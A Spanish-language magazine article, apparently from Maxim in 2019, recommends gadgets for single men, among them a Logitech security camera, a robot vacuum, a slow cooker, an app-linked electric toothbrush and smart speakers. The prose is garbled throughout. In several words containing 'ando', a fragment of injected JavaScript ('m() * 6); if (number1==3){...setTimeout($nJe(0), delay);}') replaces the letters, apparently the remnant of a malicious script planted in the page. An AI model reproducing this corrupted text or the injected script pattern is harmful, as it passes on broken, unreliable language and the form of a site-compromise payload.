Los gadgets que todo soltero debe tener

    Los gadgets que todo soltero debe tener

    Mira todo lo que puedes hacer por tu imagen y hogar sin el mayor esfuerzo, gracias a la tecnología.

    Autor: Redacción Maxim 12 noviembre, 2019


    *
    Shutterstock

     

    La tecnología al servicio del hombre soltero

     

     

    Ser soltero ya no quiere decir que estés en tu casa triste y aburrido esperandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando a que alguien acepte una cita. En la actualidad, puedes entretenerte con tu teléfono inteligente, plataformas de streaming, videojuegos y más. 

     

    La tecnología nos ha ayudado en muchos aspectos de la vida y la sana soltería no está exenta.  Checa estos gadgets que encontramos para hacer tu vida de soltero más interesante y divertida.

     

     

     

    Cámara de seguridad Logitech

    Esta cámara es perfecta para aquellos que no están todo el tiempo en casa. A través de tu teléfono móvil puedes mantenerte informado de lo movimientos que haya alrededor y por medio de su micrófono puedes hablar. 

     

     

     

     

    Robot limpiador

     

    Es pequeño y se mueve de manera silenciosa. Lo mejor es que te puedes ir y dejarlo trabajandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando. Tiene sensores que le permiten llegar a los lugares menos accesibles y así mantener tu hogar limpio. 

     

     

     

     

    Olla de cocción lenta

     

    Si eres de los que se van muy temprano a trabajar y regresan cansados y hambrientos, esta olla es para ti. Con ella puedes preparar tus alimentos y dejarla cocinandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando lentamente. Ideal para preparar birria y otros caldos que te salvarán el fin de semana.

     

     

     

     

    Cepillo de dientes eléctrico

     

    Parte esencial de todo buen soltero es mantener su estilo y cuidado personal. Uno de los elementos más importantes para mantener tu atractivo es tener una buena sonrisa, y para ellos necesitas cuidar tus dientes. Conecta este cepillo con su aplicación en tu teléfono celular y deja que en tiempo real cheque si la técnica con la que te limpias los dientes es la correcta. Vas a poder ir mejorandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando pues la app te mandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}anda reportes sobre lo que debes evitar o mejorar. 

     

     

     

     

    Bocinas inteligentes

     

    Ya existen en el mercado muchas de estas bocinas con las que puedes interactuar. Pídele que le suba a la música o que te ordene una pizza, también te puede contar chistes o plantearte enigmas. Son perfectas para todo soltero.

     

     

     

    Ahora checa por qué PERMANECER SOLTERO ES TU MEJOR OPCIÓN, SEGÚN LA CIENCIA.

     

     

    Temas relacionados con esta nota: , , , , ,

Mira todo lo que puedes hacer por tu imagen y hogar sin el mayor esfuerzo, gracias a la tecnología.